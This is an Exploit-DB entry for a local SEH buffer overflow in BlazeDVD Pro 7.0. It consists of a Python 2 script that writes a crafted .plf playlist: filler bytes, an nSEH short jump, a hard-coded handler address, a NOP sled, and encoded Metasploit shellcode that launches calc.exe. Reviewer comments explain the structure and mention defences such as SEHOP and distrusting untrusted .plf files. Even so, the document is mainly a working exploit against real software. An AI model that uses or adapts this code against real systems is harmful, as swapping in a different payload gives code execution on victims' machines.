BlazeDVD Pro Player 7.0 – ‘.plf’ Local Buffer Overflow (SEH)

  • 作者: metacom
    日期: 2014-08-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34371/
  • # BlazeDVD Pro v7.0 - (.plf) Buffer Overflow SEH 
    # Date: 19.08.2014
    # Exploit Author: metacom
    # Vendor Homepage: http://www.blazevideo.com/
    # Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
    # Version: 7.0.0.0
    # Tested on: Win 7 EN, Win 8.1 
    
    
    #!/usr/bin/python
    
    from struct import pack
     
    # Builds the content of a crafted .plf playlist for BlazeDVD Pro 7.0.0.0.
    # Read as an analyst would: filler, two 4-byte fields that land on the
    # structured-exception-handler (SEH) record, padding, then an encoded
    # payload. For triage, a playlist that opens with hundreds of identical
    # bytes followed by non-text data is the signal to look for.
    # NOTE(review): the .plf format and the vulnerable parser are not shown on
    # this page; the offsets below are the author's findings, not verified here.

    # 608 bytes of 0x41 filler.
    # NOTE(review): presumably the distance from the start of the overflowed
    # buffer to the SEH record in this build -- confirm against the binary.
    buffer= "\x41" * 608
    # Four bytes written over the "next SEH record" field. EB 06 decodes as an
    # x86 short jump; the trailing FF FF fills the rest of the 4-byte field.
    nseh="\xeb\x06\xff\xff" 
    # Little-endian 32-bit value written over the handler pointer. The author's
    # inline comment attributes the address to Configuration.dll.
    # NOTE(review): a hard-coded address only holds if that module loads at a
    # fixed base and the handler is not validated, which suggests the DLL ships
    # without ASLR/SafeSEH -- confirm with a binary-hardening check. SEHOP,
    # where enabled, is the OS-level control for this class of overwrite.
    seh=pack("<I", 0x6030F817) #6030F8175E POP ESI Configuration.dll
    # 50 bytes of 0x90 (x86 NOP) placed between the SEH fields and the payload.
    nops="\x90" * 50
    # Payload bytes. According to the two generator comments below, this is a
    # Metasploit windows/exec payload that starts calc.exe (a demonstration
    # marker), alpha_mixed-encoded to avoid the listed bytes. The bytes were
    # not decoded for this review; treat the description as the author's claim.
    # msfpayload windows/exec CMD=calc.exe R |
    # msfencode -e x86/alpha_mixed -c 1 -b '\x00\x0a\x0d\xff'
    shell=("\xdb\xcd\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" 
    "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a" 
    "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" 
    "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" 
    "\x75\x4a\x49\x69\x6c\x6b\x58\x4f\x79\x55\x50\x75\x50\x35" 
    "\x50\x33\x50\x4b\x39\x49\x75\x66\x51\x4a\x72\x52\x44\x6e" 
    "\x6b\x70\x52\x44\x70\x6e\x6b\x42\x72\x44\x4c\x4c\x4b\x63" 
    "\x62\x64\x54\x6e\x6b\x42\x52\x54\x68\x34\x4f\x6c\x77\x63" 
    "\x7a\x35\x76\x65\x61\x4b\x4f\x74\x71\x4f\x30\x6c\x6c\x65" 
    "\x6c\x71\x71\x53\x4c\x46\x62\x76\x4c\x37\x50\x49\x51\x68" 
    "\x4f\x76\x6d\x57\x71\x6b\x77\x7a\x42\x7a\x50\x32\x72\x42" 
    "\x77\x4c\x4b\x42\x72\x44\x50\x6c\x4b\x31\x52\x37\x4c\x55" 
    "\x51\x7a\x70\x4c\x4b\x33\x70\x62\x58\x4f\x75\x6b\x70\x51" 
    "\x64\x52\x6a\x77\x71\x78\x50\x42\x70\x4c\x4b\x52\x68\x47" 
    "\x68\x4c\x4b\x46\x38\x37\x50\x77\x71\x5a\x73\x58\x63\x55" 
    "\x6c\x53\x79\x4e\x6b\x66\x54\x4c\x4b\x73\x31\x38\x56\x75" 
    "\x61\x59\x6f\x36\x51\x59\x50\x4c\x6c\x6a\x61\x4a\x6f\x34" 
    "\x4d\x46\x61\x79\x57\x77\x48\x49\x70\x31\x65\x4b\x44\x65" 
    "\x53\x43\x4d\x6b\x48\x65\x6b\x53\x4d\x64\x64\x53\x45\x6d" 
    "\x32\x73\x68\x6e\x6b\x70\x58\x67\x54\x67\x71\x39\x43\x62" 
    "\x46\x6c\x4b\x76\x6c\x42\x6b\x4e\x6b\x62\x78\x45\x4c\x37" 
    "\x71\x38\x53\x4c\x4b\x46\x64\x4c\x4b\x45\x51\x48\x50\x4c" 
    "\x49\x50\x44\x71\x34\x47\x54\x71\x4b\x31\x4b\x63\x51\x31" 
    "\x49\x63\x6a\x70\x51\x69\x6f\x39\x70\x46\x38\x73\x6f\x53" 
    "\x6a\x4e\x6b\x56\x72\x58\x6b\x4b\x36\x31\x4d\x42\x4a\x55" 
    "\x51\x4c\x4d\x4d\x55\x38\x39\x65\x50\x65\x50\x65\x50\x56" 
    "\x30\x62\x48\x75\x61\x4c\x4b\x62\x4f\x4f\x77\x79\x6f\x49" 
    "\x45\x6f\x4b\x5a\x50\x6c\x75\x4d\x72\x36\x36\x42\x48\x59" 
    "\x36\x4a\x35\x4d\x6d\x6d\x4d\x49\x6f\x49\x45\x45\x6c\x45" 
    "\x56\x43\x4c\x76\x6a\x4f\x70\x39\x6b\x4b\x50\x42\x55\x36" 
    "\x65\x4d\x6b\x51\x57\x44\x53\x62\x52\x50\x6f\x62\x4a\x77" 
    "\x70\x56\x33\x6b\x4f\x4a\x75\x35\x33\x35\x31\x72\x4c\x33" 
    "\x53\x74\x6e\x32\x45\x43\x48\x75\x35\x37\x70\x41\x41")
    
    # Final file content, concatenated in the order the pieces are defined.
    poc = buffer + nseh + seh + nops + shell
    # Writes the assembled string to BlazeDVD.plf in the current working
    # directory and prints a status line.
    # NOTE(review): the try/except bodies carry no indentation in this listing
    # (whitespace was lost when the page was extracted), and the mix of
    # print(...) with the print statement marks the script as Python 2.
    # Per the page title, the overflow is reached when the affected player
    # loads the file, so the defensive controls sit on that side: treat .plf
    # files from untrusted sources as hostile input and retire version 7.0.0.0.
    # No fixed version is named on this page.
    try:
    out_file = open("BlazeDVD.plf",'w')
    out_file.write(poc)
    # The handle is closed only on the success path; a failed write leaves it
    # to the interpreter to release.
    out_file.close()
    print("[*] Malicious plf file created successfully")
    # Bare except: every failure, whatever its cause, produces the same message
    # and the underlying exception is discarded.
    except:
    print "[!] Error creating file"